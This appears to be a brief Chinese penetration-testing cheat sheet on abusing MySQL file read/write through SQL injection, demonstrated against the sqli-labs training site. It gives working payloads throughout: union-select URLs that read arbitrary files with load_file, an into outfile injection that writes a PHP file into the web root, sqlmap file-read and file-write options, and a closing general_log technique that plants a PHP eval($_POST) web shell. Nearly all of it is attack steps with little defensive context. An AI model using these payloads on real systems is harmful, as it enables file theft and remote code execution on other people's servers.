mysql读写文件

1、需要条件

secure_file_priv不为null

1、限制mysqld 不允许导入 | 导出
secure_file_priv=null或secure_file_priv

2、限制mysqld 的导入 | 导出 只能发生在/tmp/目录下
secure_file_priv=/tmp/

3、不对mysqld 的导入 | 导出做限制
secure_file_priv=

具有高权限

1)读文件

load_file("D:\flag\1.txt") #文件路径需要转义一下

http://127.0.0.7/sql/sqli-labs-master/Less-1/index.php?id=-1' union select 1,load_file("D:\\1.txt"),3%23

2)写文件

into outfile "路径"

http://127.0.0.7/sql/sqli-labs-master/Less-7/?id=-1')) union select 1,"<?php phpinfo();?>",3 into outfile "D:\\phpStudy\\WWW\\sql\\sqli-labs-master\\Less-7\\1.php"%23

3)sqlmap读写

--file-read "路径"

--file-write "要写入的内容或所在文件路径" --file-dest "要写入的路径"

2、当secure_file_priv为NULL时的利用方法

set global general_log=on;set global general_log_file='C:/phpStudy/WWW/789.php';select '<?php eval($_POST['a']) ?>';